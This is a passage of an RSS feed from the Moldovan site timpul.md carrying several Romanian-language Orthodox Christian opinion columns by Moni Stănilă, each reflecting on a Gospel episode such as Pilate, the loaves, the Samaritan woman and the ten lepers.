					<wfw:commentRss>https://timpul.md/articol/biserica-adventista-acuza-hollywoodul-de-parteneriat-cu-diavolul-si-asteapta-apocalipsa-94164.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Două lecții uitate</title>
		<link>https://timpul.md/articol/doua-lectii-uitate-88010.html</link>
					<comments>https://timpul.md/articol/doua-lectii-uitate-88010.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Wed, 24 Feb 2016 05:00:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[Evanghelie]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[pilat]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/doua-lectii-uitate-88010.html/</guid>

					<description><![CDATA[Sunt multe &#238;nvățături &#238;n Evanghelie pe care ne place să le trecem cu vederea. Nu ne convin.&#160;&#160;]]></description>
										<content:encoded><![CDATA[<p>Ne &icirc;ncurcă propriile planuri. Și fiecare creștin din lumea asta &icirc;și găsește o justificare sau alta pentru a evita anumite porunci.</p>
<p>Astăzi voi face referire la două lucruri spuse de &Icirc;nsuși Domnul nostru Iisus Hristos,  pe care foarte des le lăsăm deoparte: &bdquo;Daţi deci Cezarului cele ce sunt ale Cezarului şi lui Dumnezeu cele ce sunt ale lui Dumnezeu&quot; (Matei 22; 21) și răspunsul dat de Iisus lui Pilat: &bdquo;N-ai avea nici o putere asupra Mea, dacă nu ţi-ar fi fost dat ţie de sus.&quot; (Ioan 19; 11).</p>
<p>Știu că nimănui nu-i plac aceste cuvinte, mai ales c&acirc;nd trăiește &icirc;ntr-o țară ca Moldova. Dar așa cum Iisus i-a spus lui Pilat, &icirc;mpărăția lui Dumnezeu nu e din lumea aceasta. G&acirc;ndiți-vă că nici &icirc;n timpul prigoanelor &icirc;mpotriva creștinilor din primele patru secole, c&acirc;nd creștinii erau uciși cu miile, ei nu au &icirc;ncercat să facă revoluții sau să conteste puterile lumii. Singurele forme de protest ale creștinilor erau nerespectarea acelor porunci care le interziceau să existe. </p>
<p>Creștinii s-au implicat &icirc;n problemele bisericii, așa cum au făcut locuitorii Constantinopolului &icirc;n secolul V, c&acirc;nd l-au contestat pe patriarhul Nectarie, sau Sf&acirc;ntul Maxim Mărturisitorul care a luptat &icirc;mpotriva ereziei moniteliste. Dar ordinea politică, chiar și atunci c&acirc;nd era greșită, a fost privită ca un sistem &icirc;ngăduit de Dumnezeu. Iisus nu s-a ridicat &icirc;mpotriva romanilor, deși era un dușman incontestabil pentru Ierusalim. </p>
<p>Iisus a lăsat Cezarului ce era al lui și i-a permis lui Pilat puterea ce i-a fost dată. Ca Fiu al lui Dumnezeu putea cu un singur cuv&acirc;nt să schimbe totul și să anuleze puterea oamenilor asupra Lui. Să nu uităm că &icirc;n noaptea &icirc;n care a fost arestat, Iisus i-a spus lui Petru, care a scos sabia să &Icirc;l apere, următoarele cuvinte: &bdquo;&Icirc;ntoarce sabia ta la locul ei, că toţi cei ce scot sabia, de sabie vor pieri. Sau ţi se pare că nu pot să rog pe Tatăl Meu şi să-Mi trimită acum mai mult de douăsprezece legiuni de &icirc;ngeri?&quot; (Matei 26; 52-53)</p>
<p>Nu spun nimănui să refuze revoltele, dar să și le asume. Atunci c&acirc;nd facem un lucru care contravine credinței noastre, să nu căutăm justificări &icirc;ncerc&acirc;nd să ne convingem că facem binele, ci să acceptăm că nesocotim poruncile ce ne-au fost date pentru motive care nouă ni se par &icirc;ntemeiate. Dar să nu &icirc;ncercăm să credem că Dumnezeu ne dă dreptate, fiindcă dreptatea Lui nu e ca dreptatea omului.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/doua-lectii-uitate-88010.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Înmulțirea pâinilor</title>
		<link>https://timpul.md/articol/inmultirea-painilor-77206.html</link>
					<comments>https://timpul.md/articol/inmultirea-painilor-77206.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Sun, 26 Jul 2015 05:33:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[generozitate]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[religie]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/inmultirea-painilor-77206.html/</guid>

					<description><![CDATA[&#8222;(...)Iisus &#238;nsă le-a răspuns: N-au trebuinţă să se ducă; daţi-le voi să măn&#226;nce. Iar ei I-au zis: Nu avem aici dec&#226;t cinci p&#226;ini şi doi peşti. Şi El a zis: Aduceţi-Mi-le aici.]]></description>
										<content:encoded><![CDATA[<p>Şi poruncind să se aşeze mulţimile pe iarbă şi lu&acirc;nd cele cinci p&acirc;ini şi cei doi peşti şi privind la cer, a binecuv&acirc;ntat şi, fr&acirc;ng&acirc;nd, a dat ucenicilor p&acirc;inile, iar ucenicii mulţimilor. Şi au m&acirc;ncat toţi şi s-au săturat şi au str&acirc;ns rămăşiţele de făr&acirc;mituri, douăsprezece coşuri pline. Iar cei ce m&acirc;ncaseră erau ca la cinci mii de bărbaţi, afară de femei şi de copii.(&#8230;)&quot; (Matei 14; 14-22)</p>
<p>Această &icirc;nmulțire miraculoasă a p&acirc;inii e parte din visul oricărui popor. P&acirc;inea e extrem de importantă, chiar și &icirc;n politică cei care pot asigura p&acirc;inea pentru oameni au de c&acirc;știgat. Dar Iisus nu &icirc;nmulțeşte p&acirc;inile ca să c&acirc;știge mulțimile. De vreme ce at&acirc;ta putere de oameni L-a urmat &icirc;n acel loc pustiu, &icirc;nseamnă că ei erau deja convinși de Iisus. </p>
<p>Și totuși această minune trebuia să aibă și un rol pedagogic. Pentru că fiecare gest al lui Iisus Hristos a &icirc;nsemnat mai mult. Ne spune Matei că Iisus a binecuv&acirc;ntat și fr&acirc;nt p&acirc;inea pe care a dat-o ucenicilor să o &icirc;mpartă. C&acirc;nd auzim de fr&acirc;ngerea p&acirc;inii nu putem să nu ne g&acirc;ndim la euharistie (&icirc;mpărtășanie). &Icirc;nmulțirea p&acirc;inii e prefigurarea Sfintei &Icirc;mpărtășanii care se dă tuturor, ajung&acirc;nd tuturor, fără să se sf&acirc;rșească. Iar faptul că apostolii o dau mai departe sugerează de pe acum &icirc;nvestirea &icirc;n preoție a unor aleși care vor da poporului sfintele taine.</p>
<p>La evanghelistul Ioan, după hrănirea oamenilor, Iisus le spune celor prezenți că El este p&acirc;inea vieții și că cine nu va m&acirc;nca trupul Său nu va avea viață &icirc;n el. Vă recomand tuturor celor care aveți o Biblie la &icirc;ndem&acirc;nă să citiți după acest articol capitolul 6 din Evanghelia după Ioan pentru că acolo e pe deplin mărturisit sensul acestei &icirc;nmulțiri și tot acolo e foarte clar scris că ceea ce a spus Iisus nu avea sens figurativ. Ba chiar se menționează că mulți oameni s-au tulburat de cuvintele Lui și s-au &icirc;ntors la casele lor. Chiar și apostolii mărturisesc că acele cuvinte sunt prea grele pentru ei. <br />
Iisus totuși le-a spus limpede: &bdquo;Cel ce măn&acirc;ncă trupul Meu şi bea s&acirc;ngele Meu are viaţă veşnică, şi Eu &icirc;l voi &icirc;nvia &icirc;n ziua cea de apoi.&quot; (Ioan 6; 54).</p>
<p>Și știm prin aceste cuvinte că noi toți, c&acirc;nd ne &icirc;mpărtășim, suntem părtași la &icirc;nmulțirea p&acirc;inii, dar nu a celei trecătoare, ci a celei veșnice care e Iisus Hristos și care ni se dă nouă de El (Cel care dă și ni se dă!) prin preoții care au moștenit de la apostoli, prin succesiune ne&icirc;ntreruptă, harul preoției.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/inmultirea-painilor-77206.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>„Eu sunt&#8221;</title>
		<link>https://timpul.md/articol/eu-sunt-74050.html</link>
					<comments>https://timpul.md/articol/eu-sunt-74050.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Fri, 08 May 2015 03:24:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[duminica]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[religie]]></category>
		<category><![CDATA[slujba]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/eu-sunt-74050.html/</guid>

					<description><![CDATA[Discuția lui Iisus cu femeia samarineancă de la Ioan 4; 5-42 e de o frumusețe aparte și e redată doar la evanghelistul Ioan. Ne dăm seama de la &#238;nceput că femeia cu care vorbește Iisus la f&#226;nt&#226;nă nu e o femeie virtuoasă, fiindcă Iisus &#238;i spune &#8222;cinci bărbați ai avut şi cel pe care &#238;l ai acum nu-ţi este bărbat&#8221; (v.18) și totuși este singurul moment &#238;n cele patru evanghelii &#238;n care Iisus &#238;i spune vreunui om, fără să fie &#238;ntrebat că el e Hristosul: &#8222;I-a zis femeia: Ştim că va veni Mesia care se cheamă Hristos; c&#226;nd va veni, Acela ne va vesti nouă toate. Iisus i-a zis: Eu sunt, Cel ce vorbesc cu tine&#8221;. (v. 25-26)]]></description>
										<content:encoded><![CDATA[<p>Iudeii nu aveau voie să vorbească și să se amestece cu samarinenii. Iisus &icirc;nsă intră &icirc;n vorbă cu această femeie, &icirc;i cere apă, apoi &icirc;i vorbește despre apa vieții și &icirc;i &icirc;mpărtășește din tainele &icirc;mpărăției: &bdquo;Dar vine ceasul şi acum este, c&acirc;nd adevăraţii &icirc;nchinători se vor &icirc;nchina Tatălui &icirc;n duh şi &icirc;n adevăr, că şi Tatăl astfel de &icirc;nchinători &icirc;şi doreşte. Duh este Dumnezeu şi cei ce I se &icirc;nchină trebuie să i se &icirc;nchine &icirc;n duh şi &icirc;n adevăr&rdquo; (v. 23-24). &Icirc;nchinarea &icirc;n duh și adevăr e schimbarea radicală adusă de Iisus, dar și un cuv&acirc;nt care a creat controverse și care i-au determinat pe unii oameni să &icirc;ntrebe dacă mai e nevoie de temple &icirc;n general.</p>
<p>&Icirc;nsă ceea ce a spus El aici are tocmai legătură cu templele. Dumnezeu e duh și nu are nevoie de jertfele noastre de miei și berbeci, fapt consemnat cu mult &icirc;nainte și de profeți ca David sau Isaia. De acum Dumnezeu se aduce jertfă pentru noi, nu noi aducem pentru El. Jertfa noastră e &icirc;nchinarea &icirc;n duh și &icirc;n adevăr, nu vițeii și mieii. De aceea c&acirc;nd ucenicii vin și &Icirc;l văd pe Iisus vorbind cu o femeie (iar Evanghelia ne spune că s-au mirat din cauza asta), El le spune: &bdquo;Eu am de m&acirc;ncat o m&acirc;ncare pe care voi nu o ştiți&rdquo; (v. 32), vorbind despre patimile Sale.<br />
După ce femeia a chemat oamenii cetății, mulți dintre ei au crezut &icirc;n Iisus. Dar s-a consemnat că ei i-au spus femeii: &bdquo;Credem nu numai pentru cuv&acirc;ntul tău, căci noi &icirc;nşine am auzit şi ştim că Acesta este cu adevărat Hristosul, M&acirc;ntuitorul lumii&rdquo; (v.42). Oare ca să se arate mărturia lor despre Iisus sau pentru că ei &icirc;ncă o judecau pe femeie pentru păcatele ei? Nu știm. &Icirc;nsă știm că pe această femeie a ales-o Iisus ca să &icirc;i mărturisească dumnezeirea lui. Și nu să o recunoască, fiindcă ea nu L-a &icirc;ntrebat, ci El singur să &icirc;i spună, de la Sine, &bdquo;Eu sunt Hristosul&quot;. <br />
Fiindcă așa cum știm, judecata lui Dumnezeu nu e ca judecata omului. Iar ceea ce noi vedem &icirc;ntr-un om, nu e ceea ce vede Dumnezeu. Uităm adesea că Iisus a venit pentru &bdquo;oile pierdute&quot;. Și că &icirc;nchinarea &icirc;n duh și adevăr se referă tocmai la inima omului, cea pe care doar Dumnezeu o vede. Noi vedem faptele celor din jur, dar inima nu o vedem. Iisus a văzut &icirc;n sufletul acestei femei și i-a spus ei, ce nu spusese nici măcar apostolilor.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/eu-sunt-74050.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Scăldătoarea Vitezda</title>
		<link>https://timpul.md/articol/scaldatoarea-vitezda-73594.html</link>
					<comments>https://timpul.md/articol/scaldatoarea-vitezda-73594.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Sat, 02 May 2015 05:18:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[Biblie]]></category>
		<category><![CDATA[evrei]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[scaldatoare]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/scaldatoarea-vitezda-73594.html/</guid>

					<description><![CDATA[Un om bolnav de 38 de ani aștepta l&#226;ngă o scăldătoare despre care ni se spune că se tulbura c&#226;nd o atingea un &#238;nger și devenea miraculoasă pentru cei care intrau primii &#238;n apă.&#160;]]></description>
										<content:encoded><![CDATA[<p>&Icirc;nsă acest om nu avea nici un alt ajutor și, din pricina bolii, nu reușea să ajungă printre primii la apă. Iisus &icirc;l vindecă, iar cei de acolo sunt supărați că bolnavul și-a str&acirc;ns lucrurile de acolo &icirc;n zi de sabat. (Ioan 5; 1-15)</p>
<p>Sunt mai multe &icirc;nvățături &icirc;n acest cuv&acirc;nt de la Ioan. Scăldătoarea, ni se spune, avea cinci pridvoare. E aproape ciudat că se menționează numărul pridvoarelor. Fiindcă evangheliștii sunt economi &icirc;n text și nu dau detalii &icirc;n plus doar pentru a &icirc;nfrumuseța lectura. Așa că unii s-au g&acirc;ndit că de vreme ce apa reprezintă firea omului, cele cinci pridvoare corespund celor cinci simțuri ale omului: văzul, auzul, pipăitul, mirosul, gustul. Pentru a ne vindeca de păcate trebuie să intrăm &icirc;n noi &icirc;nșine și să aducem la starea de curăție cele cinci simțuri. Pentru că &bdquo;apele&rdquo; sunt tulburate &icirc;năuntrul nostru de la scăldătoarea Botezului.</p>
<p>O &icirc;nvățătură clară e și cea desprinsă din furia evreilor că Iisus a vindecat &icirc;n zi de sabat. Fiindcă ni se spune limpede că nu există anumite momente pentru a face binele. Trebuie să facem bine &icirc;n orice clipă. Așa cum un Avvă din Pateric, fiind strigat de la rugăciune s-a ridicat să &icirc;i deschidă fratelui. Acesta văz&acirc;nd că bătr&acirc;nul se ruga și-a cerut iertare că l-a &icirc;ntrerupt, dar Avva i-a răspuns: &bdquo;Rugăciunea mea ești tu&rdquo;. La fel ar trebui să facem și noi. C&acirc;nd cineva are nevoie de ajutor, lăsăm toate și mergem &icirc;n &icirc;nt&acirc;mpinarea lui.</p>
<p>&Icirc;nsă versetul de care n-ar trebui să uităm niciodată, e dat &icirc;n clipa &icirc;n care cel vindecat se re&icirc;nt&acirc;lnește cu Iisus &icirc;n templu, iar Iisus &icirc;i spune: &bdquo;Iată că te-ai făcut sănătos. De acum să nu mai păcătuieşti, ca să nu-ţi fie ceva mai rău.&rdquo; (v.14). Este un sfat pe care noi toți nu &icirc;l luăm &icirc;n seamă &icirc;n viața noastră. Păcătuim și ne spovedim, apoi o luăm de la capăt cu aceleaşi păcate. Nu ne g&acirc;ndim că ne va fi și mai rău dec&acirc;t ne-a fost la &icirc;nceput.<br />
Apare un necaz &icirc;n familie, toți sunt disperați. Atunci putem posti, ne putem ruga și așteptăm ca Iisus să vină și să ne vindece, fiindcă nu avem alt Om care să ne scalde &icirc;n apa miraculoasă. Și cum trece necazul, cum &icirc;ncet-&icirc;ncet uităm și &icirc;ncepem să trăim la fel ca &icirc;nainte. Iar cu timpul ajungem să credem că am fi reușit și singuri la scăldătoare. </p>
<p>Așa facem cu toate lucrările dumnezeiești din viața noastră, c&acirc;nd ni se &icirc;nt&acirc;mplă, suntem cuprinși de teamă și recunoștință. Fie că depășim o boală grea, un accident sau că pur și simplu ni se schimbă viața &icirc;n bine. La &icirc;nceput suntem pioși și mulțumitori, apoi, trăind mai departe cu păcatele și patimile noastre, ni se &icirc;mpietrește inima at&acirc;t de tare că ajungem să negăm ceea ce am văzut cu ochii noștri. Pentru că p&acirc;nă să ni se &icirc;mpietrească inima, ne-am bucurat de miracolul pe care l-am trăit, dar am uitat cuvintele lui Iisus din templu (cuvinte pe care biserica ni le amintește zilnic): &bdquo;De acum să nu mai păcătuieşti, ca să nu-ţi fie ceva mai rău&rdquo;.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/scaldatoarea-vitezda-73594.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cei zece leproși</title>
		<link>https://timpul.md/articol/cei-zece-leprosi-68817.html</link>
					<comments>https://timpul.md/articol/cei-zece-leprosi-68817.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Sun, 25 Jan 2015 09:30:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[religie]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/cei-zece-leprosi-68817.html/</guid>

					<description><![CDATA[&#8222;L-au &#238;nt&#226;mpinat zece leproşi care stăteau departe, și care au ridicat glasul şi au zis: Iisuse, &#206;nvăţătorule, fie-Ţi milă de noi! Şi văz&#226;ndu-i, El le-a zis: Duceţi-vă şi vă arătaţi preoţilor. Dar, pe c&#226;nd ei se duceau, s-au curăţit. Iar unul dintre ei, văz&#226;nd că s-a vindecat, s-a &#238;ntors cu glas mare slăvind pe Dumnezeu. Şi a căzut cu faţa la păm&#226;nt la picioarele lui Iisus, mulţumindu-I. Şi acela era samarinean. Şi răspunz&#226;nd, Iisus a zis: Au nu zece s-au curăţit? Dar cei nouă unde sunt? Nu s-a găsit să se &#238;ntoarcă să dea slavă lui Dumnezeu dec&#226;t numai acesta, care este de alt neam? Şi i-a zis: Scoală-te şi du-te; credinţa ta te-a m&#226;ntuit.&#8221; (Luca 17; 12-19).]]></description>
										<content:encoded><![CDATA[<p>Și aici, ca &icirc;n pilda celui căzut &icirc;ntre t&acirc;lhari, vedem că singurul care se comportă așa cum ar trebui e samarinean (este binecunoscută sila iudeilor față de samarineni). Acolo doar samarineanul &icirc;l ajută pe cel căzut &icirc;ntre t&acirc;lhari, aici doar samarineanul cade &icirc;naintea Domnului ca să mulțumească pentru binele pe care i l-a făcut lui Dumnezeu. Deși cei din poporul ales erau convinși că Mesia va fi doar al lor și că vă stăp&acirc;ni păm&acirc;ntul supun&acirc;ndu-i ca pe slugi pe celelalte popoare, ei nu par pregătiți să &Icirc;l accepte pe Iisus ca Domn și Dumnezeu. Se comportă de parcă tot binele li se cuvine. </p>
<p>Iisus subliniază că doar unul de alt neam s-a &icirc;ntors să mulțumească ca să evidențieze că nu un anumit statut ne m&acirc;ntuiește. Și noi credem de multe ori că doar datorită faptului că mergem la biserică (sau la o anumită biserică) ne &icirc;ndreptățește să fim moștenitorii raiului. Mai ales că dacă citim cu atenție vedem că toți cei 10 leproși au avut credință. Fiindcă toți &icirc;l roagă pentru vindecare, iar c&acirc;nd Iisus &icirc;i trimite să se arate preoților ei &icirc;ncă nu erau vindecați. Dar au avut credință și L-au ascultat. Evanghelia ne spune că s-au vindecat &icirc;n timp ce se duceau să se prezinte preoților. </p>
<p>Vedem astfel că s-au rugat, convinși că Iisus &icirc;i poate vindeca, și au pornit la drum cu credință după porunca dată de El. Ce le-a lipsit atunci celorlalți? Recunoștința. Dar nu e doar at&acirc;t. Iisus nu a spus doar că ceilalți 9 nu au venit să mulțumească, ci mai ales i-a spus celui de al zecelea: &bdquo;Scoală-te şi du-te; credinţa ta te-a m&acirc;ntuit.&rdquo; Pe l&acirc;ngă bunăstarea trupească, acesta s-a și m&acirc;ntuit. </p>
<p>Exact &icirc;n acest punct uităm și noi de Dumnezeu. Cerem binecuv&acirc;ntare, sănătate, spor, viață &icirc;ndelungată; avem &icirc;ncredere că Domnul ni le dă, dar uităm să mulțumim. Ne comportăm ca și cum am avea vreun merit pentru toate cele bune din viața noastră. &Icirc;nsă această &icirc;nt&acirc;mplare din Evanghelie ne atrage atenția că nu doar trupul are nevoie de bunăstare. La nimic nu ne va folosi trupul nostru sănătos, dacă sufletul nu se va m&acirc;ntui.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/cei-zece-leprosi-68817.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Înălțarea Sfintei Cruci</title>
		<link>https://timpul.md/articol/inaltarea-sfintei-cruci-63696.html</link>
					<comments>https://timpul.md/articol/inaltarea-sfintei-cruci-63696.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Mon, 22 Sep 2014 05:01:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[Dumnezeu]]></category>
		<category><![CDATA[Evanghelie]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[Socrote]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/inaltarea-sfintei-cruci-63696.html/</guid>

					<description><![CDATA[A fost r&#226;nduit ca &#238;n această sărbătoare să se citească despre răstignirea Domnului din Evanghelia după Ioan (capitolul 19).<br />]]></description>
										<content:encoded><![CDATA[<p>Cu alte ocazii am vorbit deja despre faptul că nu at&acirc;t tortura se evidențiază &icirc;n răstignirea Fiului lui Dumnezeu, c&acirc;t mai ales umilința. Tortura a fost aplicată de-a lungul istoriei multor bărbați de v&acirc;rsta lui Iisus, &icirc;nsă umilirea, scuiparea și pălmuirea Celui care este Dumnezeu adevărat din Dumnezeu adevărat sunt momente cumplite care subliniază și diferențiază jertfa M&acirc;ntuitorului de alte sacrificii din istoria umanității. Cum spunea și Nicolae Steinhardt: e incomparabilă moartea lui Socrate cu cea a lui Iisus. &Icirc;n timp ce filosoful moare &icirc;nconjurat de ucenici, Iisus moare dezbrăcat și umilit.</p>
<p>Am vorbit &icirc;n repetate r&acirc;nduri și de discuția dintre Iisus și Pilat, mai ales despre momentul &icirc;n care Iisus &icirc;i spune: &bdquo;N-ai avea nici o putere asupra Mea, dacă nu ţi-ar fi fost dat ţie de sus.&quot; &Icirc;nsă mai puțin se discută despre ceea ce a spus mai departe: &bdquo;De aceea cel ce M-a predat ţie mai mare păcat are.&quot; (Ioan 19; 11).</p>
<p>&Icirc;ntotdeauna oamenilor le este mai la &icirc;ndem&acirc;nă să decupeze din context ceea ce le convine. Spunem: &bdquo;și ne iartă nouă greșelile noastre&quot; aștept&acirc;nd asta, dar mai puțin ne concentrăm pe continuare: &bdquo;precum și noi iertăm greșiților noștri&quot;. De aceea de mintea noastră s-a prins mai ușor prima frază din răspunsul dat lui Pilat. E o putere r&acirc;nduită de sus, așa trebuia să se &icirc;nt&acirc;mple, era planul din veci al lui Dumnezeu ca Iisus să moară pentru păcatele noastre. Nu am avea nici o putere dacă nu ne-ar fi dată de sus de la Dumnezeu &#8211; Tată, Fiu și Duh Sf&acirc;nt. &Icirc;nțelegem fără nici o greutate nu doar diferența colosală dintre Dumnezeu (Iisus) și om (Pilat), ci și supremația cuprinsă &icirc;n fraza rostită. </p>
<p>&Icirc;nsă, de multe ori, pierdem din vedere un aspect esențial cuprins &icirc;n a doua frază: cel ce M-a predat ţie mai mare păcat are. Puterea pe care un om o primește de sus, indiferent de ce tip este ea, nu e un prerogativ de care omul dispune după bunul plac. De la episcop la director de fabrică, de la miniștrii și judecători la consilierii locali din primăria satului &#8211; orice om e responsabil de faptele sale. Iisus nu &icirc;i spune lui Pilat: n-ai nici o vină, stai liniștit! sau tu trebuie să duci la bun sf&acirc;rșit planul lui Dumnezeu de m&acirc;ntuire a lumii. Ci &icirc;i spune: și tu ai păcat, dar nu at&acirc;t de mare ca al celui care M-a adus legat &icirc;naintea ta.</p>
<p>Dacă am accepta că Pilat doar a &icirc;mplinit un rol necesar, ar trebui să acceptăm și faptul că Iuda a ajutat cel mai mult ca noi să fim m&acirc;ntuiți prin răstignirea și &icirc;nvierea Domnului. &Icirc;nsă lucrurile sunt &icirc;ntotdeauna mai complexe și nimic nu scuză abuzul de putere al lui Iuda, ca apropiat al lui Iisus, sau al lui Pilat. Arhiereii oricum urmăreau să &Icirc;l prindă pe Iisus, forț&acirc;nd putem spune că și un trecător putea să meargă și să le ceară bani arhiereilor ca să le dezvăluie unde e Iisus.</p>
<p>&Icirc;n toate relele din jurul nostru există &icirc;nlănțuiri de cauze și decizii. Și toți cei implicați au puterea de a schimba sau de a duce mai departe. De la Iuda, la Ana, la Caiafa, la Pilat. Dacă știm contextul istoric de atunci, știm și faptul că Pilat se temea de răscoale și că o decizie potrivnică Sinedriului &icirc;l putea costa viața. &Icirc;nsă, chiar și cu prețul vieții, deși nu ar fi reușit să &icirc;mpiedice răstignirea, ar fi putut să nu fie părtaș. </p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/inaltarea-sfintei-cruci-63696.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Din convorbirea lui Iisus cu Nicodim</title>
		<link>https://timpul.md/articol/din-convorbirea-lui-iisus-cu-nicodim-63351.html</link>
					<comments>https://timpul.md/articol/din-convorbirea-lui-iisus-cu-nicodim-63351.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Mon, 15 Sep 2014 05:00:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
		<category><![CDATA[convorbire]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[Nicodim]]></category>
		<category><![CDATA[religie]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/din-convorbirea-lui-iisus-cu-nicodim-63351.html/</guid>

					<description><![CDATA[&#8222;După cum Moise a &#238;nălţat şarpele &#238;n pustie, aşa trebuie să se &#238;nalţe Fiul Omului, ca tot cel ce crede &#238;n El să nu piară, ci să aibă viaţă veşnică.&#160;]]></description>
										<content:encoded><![CDATA[<p>Căci Dumnezeu aşa a iubit lumea, &icirc;nc&acirc;t pe Fiul Său Cel Unul-Născut L-a dat ca oricine crede &icirc;n El să nu piară, ci să aibă viaţă veşnică. Căci n-a trimis Dumnezeu pe Fiul Său &icirc;n lume ca să judece lumea, ci ca să se m&acirc;ntuiască, prin El, lumea.&quot; (Ioan 3; 13-17)<br />
Pentru oricine citește aceste versete e evident că se vorbește despre răstignirea Domnului nostru Iisus Hristos și despre m&acirc;ntuirea tuturor celor ce cred prin jertfa Lui. Aceste cuvinte rostite de Iisus către Nicodim au fost r&acirc;nduite să se citească &icirc;nainte de prăznuirea &Icirc;nălțării Sfintei Cruci. Așa cum și &icirc;n duminicile ce urmează se va citi tot despre răstignire și cruce.</p>
<p>Iisus a folosit de multe ori comparația pentru ca oamenii să &icirc;nțeleagă mai bine cuvintele Lui. Poate nu toți &icirc;și amintesc de momentul &icirc;n care afl&acirc;ndu-se poporul ales &icirc;n pustie, sub &icirc;ndrumarea lui Moise, au &icirc;nceput cei din popor să c&acirc;rtească &icirc;mpotriva lui Moise, deci indirect &icirc;mpotriva lui Dumnezeu. Și s-au abătut asupra lor șerpi veninoși. Atunci Dumnezeu i-a spus lui Moise ce să facă pentru ca cei mușcați de șerpi să trăiască: &bdquo;Şi a făcut Moise un şarpe de aramă şi l-a pus pe un st&acirc;lp; şi c&acirc;nd un şarpe muşca vreun om, acesta privea la şarpele cel de aramă şi trăia.&quot; (Numeri 21; 9) De aici &icirc;nțelegem cum trebuie să privim spre Hristos. Pe de o parte, să avem credință, pe de alta, să privim spre Hristos, Care a primit să moară pe cruce pentru noi. </p>
<p>Un alt aspect important &icirc;n aceste versete e semnificația sintagmei &bdquo;Fiul Său Cel Unul-Născut&quot;. Atributul de Fiu nu se referă doar la faptul că Iisus e singurul Fiu al lui Dumnezeu născut din veci din Tatăl. Ci și la faptul că prin jertfa Lui, noi toți devenim, din robi, fii ai lui Dumnezeu. &Icirc;nsă nu prin naștere, ci prin harul &icirc;nfierii pe care Iisus L-a dob&acirc;ndit pentru noi prin jertfa Sa. Iar &bdquo;Unul-Născut&quot; are &icirc;n vedere faptul că noi, ca ființe create de Dumnezeu, chiar dacă ne-am născut din părinții noștri trupești, nu suntem născuți din Dumnezeu, ci suntem creați de El. Singurul Născut din Dumnezeu e Iisus Hristos, Care prin nașterea Sa din Fecioara Maria a unit &icirc;n Persoana Sa necreatul (firea dumnezeiască) cu creatul (firea umană), cerul cu păm&acirc;ntul, cele nevăzute cu cele văzute, dar mai ales L-a unit pe Dumnezeu cu omul (Sf&acirc;ntul Maxim Mărturisitorul &icirc;n Ambigua adaugă: femeia cu bărbatul).</p>
<p>Iar referitor la iubirea lui Dumnezeu față de noi, aș &icirc;ncheia cu următorul verset: &bdquo;&Icirc;n aceasta este dragostea, nu fiindcă noi am iubit pe Dumnezeu, ci fiindcă El ne-a iubit (mai &icirc;nt&acirc;i!) pe noi şi a trimis pe Fiul Său jertfă de ispăşire pentru păcatele noastre&quot; (I Ioan 4; 10).&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/din-convorbirea-lui-iisus-cu-nicodim-63351.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Să nu oprim cuvântul</title>
		<link>https://timpul.md/articol/sa-nu-oprim-cuvantul-45720.html</link>
					<comments>https://timpul.md/articol/sa-nu-oprim-cuvantul-45720.html#respond</comments>
		
		<dc:creator><![CDATA[Moni Stănilă]]></dc:creator>
		<pubDate>Sun, 14 Jul 2013 08:36:00 +0000</pubDate>
				<category><![CDATA[Opinii și Editoriale]]></category>
